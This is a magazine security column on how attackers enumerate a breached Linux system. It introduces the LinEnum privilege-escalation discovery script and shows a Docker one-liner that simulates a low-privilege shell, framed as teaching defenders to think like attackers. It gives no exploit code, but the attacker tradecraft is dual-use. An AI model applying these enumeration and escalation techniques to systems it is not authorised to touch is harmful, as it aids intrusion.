32 \ August 2019 \ http://www.phparch.comSecurity Corner
System Enumeration
Eric Mann
The first step to protecting your system is to understand the actions, behaviors, and motivations of
those who would potentially breach and damage that system. Learning to think like an attacker is
excellent. Mastering the tools attackers are likely to use on your platform is even better.No system is ever entirely secure. One of the libraries your
application relies upon probably has a vulnerability lying in
wait, undetected, for an attacker to exploit. Your code might
have a flaw that’s hidden beneath a deep unit test suite just
waiting for an attacker to pounce.
You can only protect yourself from the attacks you know are
coming. If there’s an unknown attack out there, the best you
can do is assume you’ll face it and prepare for the inevitable
remediation to follow. Assuming you’re well-prepared, you’re
already exhaustively logging and monitoring^1 your system to
keep an eye open for unexpected behavior, new user creation,
or other administrative events that indicate an attacker is
inside the machine. The question isn’t that they’ll get in, it’s
what exactly they’ll do once they’ve breached your system.The First Few Moments
The first few moments an attacker is on the inside are crit-
ical. They’ve breached your outer defenses and are free to
run rampant through your files, database, and server. This
freedom means they can do just about anything they want—
but it comes at a price. The more an attacker does within a
system, the more likely it is the victim will notice.
An attacker must gather as much information as possible,
as quickly as they can, with as few commands as they can
manage. This behavior helps maximize the data available for
future attacks while minimizing the footprint left behind to
alert you they were ever there.Linux Enumeration
Hey hackers!
You get a low priv shell on a linux box.
You have 10 minutes before blue detects you. ⏱ 略
After you’ve done the quick & basic whoami/pwd type
stuff...
What are any TWO of the next ten commands you run
to get the most gains/enum in your 10 minutes?
@JaneScott, June 27, 2019Security professionals frequently work together and
exchange notes to refine best practices and help strengthen
the community as a whole. It’s refreshing to see experts1 exhaustively logging and monitoring:
https://phpa.me/security-corner-jan-2018collaborating to help keep one another—and those they work
with—secure. It’s also enlightening to see the kinds of tools
they develop and exchange as each can help you strengthen
your game as well.
One of the more popular and easier-to-use tools for
system enumeration in Linux is the aptly-named LinEnum^2.
LinEnum is a simple script that enumerates information
about the machine it’s run on. It also helps identify ways the
current, unprivileged user might escalate their level of access
to the system and perform deeper attacks.LinEnum in Action
To demonstrate how LinEnum does its magic, we’re going
to spin up a limited use Docker container to simulate our
production server. You could alternatively run things inside a
fully-fledged virtual machine. The Docker instance gives us a
similar environment and helps demonstrate how an attacker
might attempt to breach a container running in production.
The following one-liner creates a container based on a small
Alpine-derived image which has nothing in it but the wget
utility. We override the Docker entry point to put ourselves on
a shell as if we’d logged in using sniffed or guessed credentials.
The additional --user flag is to ensure we are authenticated as
a non-privileged user^3 —in this case, nobody.
In practice, an attacker might attempt to log in as anyone
who has access to the machine. The usual avenue of attack
is the root user, who exists by default. In other systems, an
attacker might look for a webuser, or nginx, or www-data or a
similar, standard username that exists on most systems. If
they ever get in, they can do exactly as we’re about to do with
nobody in our Docker container.docker run -it --rm --entrypoint=/bin/sh \
--user 65534:65534 mwendler/wgetYour production server might be running Alpine. It
might be running Debian, or it might be running some-
thing else. Regardless, if someone has permission to log in
to your server, and wget is available, this example works.
If you have curl available, or a language (like PHP) that
can download files via a script, it’s not too difficult to
change this example. Just removing wget is not a solution
to this issue.2 LinEnum: https://github.com/rebootuser/LinEnum
3 non-privileged user: https://phpa.me/security-corner-apr-2018